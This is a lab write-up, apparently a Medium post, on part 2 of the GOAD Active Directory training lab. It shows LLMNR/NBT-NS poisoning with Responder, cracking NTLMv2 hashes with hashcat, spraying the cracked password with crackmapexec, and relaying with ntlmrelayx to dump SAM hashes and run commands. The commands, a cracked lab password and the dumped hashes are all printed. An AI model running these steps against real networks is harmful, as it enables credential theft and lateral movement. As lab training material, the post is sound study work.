Solving Game of Active Directory (GOAD) by Orange Cyberdefense Part-2

n00🔑
3 min readOct 22, 2023

LLMNR and NBT-NS Poisoning

LLMNR (Link-Local Multicast Name Resolution) poisoning, also known as NBT-NS (NetBIOS Name Service) poisoning, is a network attack that involves the manipulation or interception of DNS-like name resolution requests within a local network. This attack targets the way Windows devices attempt to resolve hostnames to IP addresses when DNS name resolution fails. LLMNR and NBT-NS are used as fallback methods for hostname resolution, primarily in Windows environments.

Here’s an overview of LLMNR poisoning:

How LLMNR Works:

When a Windows system attempts to resolve a hostname to an IP address and standard DNS resolution fails, it may use LLMNR and NBT-NS as fallback mechanisms.
LLMNR uses multicast messages to query other devices on the local network for the hostname’s IP address.
NBT-NS works similarly but uses NetBIOS broadcasts to resolve hostnames.
LLMNR Poisoning:

LLMNR poisoning is a type of man-in-the-middle (MITM) attack where an attacker intercepts LLMNR and NBT-NS requests on the local network.
The attacker responds to these requests with spoofed responses, claiming to be the target device with the requested hostname.
This can redirect network traffic to the attacker’s system, potentially allowing for eavesdropping or other malicious activities.

responder -I vboxnet0 -wd

We got hashes of 2 new users NORTH\eddard.stark and NORTH\robb.stark. Now we can either relay these hashes or crack them using Hashcat.

Cracking Hashes:

hashcat -m 5600 ntlmv2-ssp-hashes /usr/share/wordlists/rockyou.txt

We were able to crack hash of user robb.stark but for user eddard.stark we didn’t found the password in the rockyou.txt

Checking the creds for robb.stark on all hosts.

crackmapexec smb live_hosts -u "robb.stark" -p "sexywolfy"

We got RCE on 192.168.56.11(WINTERFELL) machine. We can try to rdp to WINTERFELL machine.

xfreerdp /u:robb.stark /v:192.168.56.11 /p:sexywolfy

Next thing we can try is to relay these hashes to hosts with smb signing disabled. To generate a list of hosts with smb signing disabled we can use the below command-

crackmapexec smb live_hosts --gen-relay-list hosts-smb-signing-disabled.txt

Relaying the hashes to hosts with smb signing disabled-

Note: responder should be running as well with smb disabled as, now ntlmrelayx will be listening on port 445.

impacket-ntlmrelayx -tf hosts-smb-signing-disabled.txt -smb2support

By default ntlmrelayx will dump the hashes from SAM hive.

Administrator:500:aad3b435b51404eeaad3b435b51404ee:dbd13e1c4e338284ac4e9874f7de6ef4:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:0e181c6215bdbfd5b93917da349fc7cd:::
vagrant:1000:aad3b435b51404eeaad3b435b51404ee:e02bc503339d51f71d913c245d35b50b:::

For command execution we can use -c option

impacket-ntlmrelayx -tf hosts-smb-signing-disabled.txt -smb2support -c 'whoami /all' -debug

When smb signing is enabled on client side, we need to use

--no-multirelay

option.

References:

https://wadcoms.github.io/wadcoms/Impacket-NTLMRelayX/

https://blog.fox-it.com/2017/05/09/relaying-credentials-everywhere-with-ntlmrelayx/

https://www.secureauth.com/blog/we-love-relaying-credentials-a-technical-guide-to-relaying-credentials-everywhere/

https://raxis.com/blog/ad-series-how-to-perform-broadcast-attacks/

--

--